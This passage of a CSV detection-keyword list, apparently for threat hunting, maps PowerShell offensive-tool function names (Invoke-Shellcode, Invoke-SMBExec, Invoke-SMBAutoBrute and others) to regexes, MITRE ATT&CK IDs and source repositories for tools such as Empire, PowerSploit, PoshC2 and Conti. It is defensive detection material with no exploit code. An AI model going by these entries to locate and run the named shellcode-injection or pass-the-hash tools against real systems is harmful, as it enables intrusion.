tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSniper*",".{0,1000}Invoke\-SharpSniper.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSploit*",".{0,1000}Invoke\-SharpSploit.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpsploit_nomimi*",".{0,1000}Invoke\-Sharpsploit_nomimi.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpSSDP*",".{0,1000}Invoke\-SharpSSDP.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpStay*",".{0,1000}Invoke\-SharpStay.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpUp*",".{0,1000}Invoke\-SharpUp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharpview*",".{0,1000}Invoke\-Sharpview.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpWatson*",".{0,1000}Invoke\-SharpWatson.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharpweb*",".{0,1000}Invoke\-Sharpweb.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpWeb.ps1*",".{0,1000}Invoke\-SharpWeb\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SharpWSUS*",".{0,1000}Invoke\-SharpWSUS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Shellcode -Payload *",".{0,1000}Invoke\-Shellcode\s\-Payload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-Shellcode -ProcessId *",".{0,1000}Invoke\-Shellcode\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-Shellcode -Shellcode *",".{0,1000}Invoke\-Shellcode\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-Shellcode -Shellcode*",".{0,1000}Invoke\-Shellcode\s\-Shellcode.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an 
assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*Invoke-Shellcode*",".{0,1000}Invoke\-Shellcode.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1139","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Shellcode.ps1*",".{0,1000}Invoke\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Invoke-ShellcodeMSIL*",".{0,1000}Invoke\-ShellcodeMSIL.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1074","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ShellCommand*",".{0,1000}Invoke\-ShellCommand.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SlinkyCat*",".{0,1000}Invoke\-SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-smbclient 
*",".{0,1000}invoke\-smbclient\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SMBClient*",".{0,1000}Invoke\-SMBClient.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SMBClient.ps1*",".{0,1000}Invoke\-SMBClient\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. 
WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*invoke-smbexec *",".{0,1000}invoke\-smbexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-smblogin *",".{0,1000}invoke\-smblogin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-SMBNegotiate -ComputerName localhost*",".{0,1000}Invoke\-SMBNegotiate\s\-ComputerName\slocalhost.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SMBNegotiate*",".{0,1000}Invoke\-SMBNegotiate.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 